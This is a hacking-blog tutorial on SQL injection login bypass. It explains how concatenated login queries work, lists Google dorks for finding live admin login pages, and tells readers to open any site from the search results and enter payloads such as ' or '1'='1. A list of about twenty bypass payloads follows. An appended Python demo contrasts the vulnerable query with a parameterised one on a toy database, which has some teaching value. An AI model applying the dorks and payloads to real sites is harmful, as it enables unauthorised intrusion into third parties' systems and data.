SQL injection Basics

Hey guys, it has been a long time since we have written any article. Sorry for that :/ . I am going to start a series of tutorials based on manual SQL injection.
You might have seen many tools for SQL injection like Havij, SQLmap, darkMySQLi, etc.
But if you want to write your own tool, you need to learn manual SQLi first.
This tutorial covers the basics of SQLi: how to bypass a login form using SQL injection.

Short introduction to SQL
SQL stands for Structured Query Language. It is the language used to talk to a relational database, in the form of queries.
Database : In simple words, a database is a collection of data stored in a structured manner. The software that stores and manages it is a database management system (DBMS).
Eg: MySQL, MSSQL, MS Access, PostgreSQL, Oracle, etc.



SQL injection
SQL injection (SQLi) is an attack in which input supplied by the user is pasted straight into an SQL query, so the attacker can change what the query does: bypass a check, read data the application never meant to expose, or modify it. Injection has ranked at or near the top of the OWASP Top 10 list of web application risks for years.

How does a simple login system work?
Whenever you log in to a simple site, the code behind the form builds a login query that looks something like this (PHP-style, with the form values concatenated straight into the SQL text, no escaping and no parameter binding):

$query = "SELECT * FROM USER
          WHERE ID = '" . $_GET['username'] . "'
          AND PASS = '" . $_GET['password'] . "'";

As you enter your login details, say ID = admin and PASS = password, the query that reaches the database becomes:

SELECT * FROM USER
WHERE ID = 'admin'
AND PASS = 'password';

If that query returns a row, the application treats you as logged in.


Bypassing Login Access
So now we know how the login system works, let's break it :D.

Finding a vulnerable site :

This is where Google dorks come in handy. Here are some to start with; I will write a separate article explaining how to use Google dorks.


inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administratorlogin.asp
inurl:login/administrator.asp
inurl:administrator_login.asp

Just paste one of these dorks into the Google search bar and open any site from the search results.
You will land on an admin login form with a user name field and a password field.


Let's do some injection :

Now type anything in the User and Password fields and click on login. What happened?
No access, as expected.
Now let's give the admin panel an injection of our SQLi.
In both the User and the Password field type ' or '1'='1 and click on login. If the login code looks like the query above, you are in the admin panel.


So how does this work?
The single quote at the start of the payload closes the string the application opened around our input, and everything after it becomes part of the SQL itself. With ' or '1'='1 in both fields the WHERE clause reads ID = '' or '1'='1' AND PASS = '' or '1'='1'. Since '1'='1' is always true, the condition holds for every row, the query returns the first user (very often the admin), and the application takes that as a successful login.
Two details matter. AND binds tighter than OR, so with the payload in the user field only the condition would be ID = '' OR ('1'='1' AND PASS = 'whatever') and still fail; that is why it goes in both fields, or you use a variant ending in -- that comments out the rest of the query. And the payload deliberately has no closing quote of its own: the application's own closing quote completes it, so the quotes stay balanced and the query still parses.

Here are some more payloads. They all do the same job but differ in which quote character they close (single or double), whether they also close a parenthesis, and how they comment out the rest of the query (-- or #, the latter being MySQL only). Which one works depends on how the vulnerable query is written, so try them in turn.

' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
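To make the login query and the payload list concrete, here is an added example (mine, not code from the original post) in Python: a toy login check that concatenates user input into SQL exactly as the query above does, beside a parameterised version, run against an in-memory SQLite database. The users table, the admin/s3cret row and the helper names are constructed for this demonstration. It also feeds a few payloads from the list into both fields and reports which bypass the check, which are just treated as text, and which break the query on this engine, which is why the list has so many variants.

```python
import sqlite3

# Constructed sample data: a single account, so there is something to bypass.
SAMPLE_USERS = [("admin", "s3cret")]


def make_db():
    """In-memory SQLite database standing in for the site's USER table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def build_vulnerable_query(username, password):
    """The post's query: form values concatenated straight into the SQL text."""
    return ("SELECT * FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")


def vulnerable_login(conn, username, password):
    """True if the concatenated query matches any row (the 'logged in' case)."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row is not None


def safe_login(conn, username, password):
    """Same check with bound parameters: the driver sends the values separately
    from the statement, so a quote inside them can never alter the SQL."""
    row = conn.execute(
        "SELECT * FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def try_payload(conn, payload):
    """Put the same payload in both fields, as the post does, and classify the
    outcome: 'bypass' (logged in without valid credentials), 'denied' (payload
    was just a harmless string) or 'error' (the query no longer parses on this
    engine, e.g. the MySQL-only # comment or an unmatched parenthesis)."""
    try:
        return "bypass" if vulnerable_login(conn, payload, payload) else "denied"
    except sqlite3.Error:
        return "error"


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_query("' or '1'='1", "' or '1'='1"))
    for p in ["' or '1'='1", "' or 1=1 --", '" or "x"="x', "') or ('x'='x", "' or 0=0 #"]:
        print(f"{p!r:20} -> {try_payload(db, p)}")
    print("parameterised login with the same payload:",
          safe_login(db, "' or '1'='1", "' or '1'='1"))
```

Running it shows the ' or '1'='1 and ' or 1=1 -- payloads logging in with no valid credentials, the double-quote variant being compared as a plain string and denied, and the parenthesis and # variants raising syntax errors, since SQLite has no # comments and the toy query has no parentheses to close. The parameterised version denies every payload, because the values never become part of the statement.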


If you have any problem just ask in comments.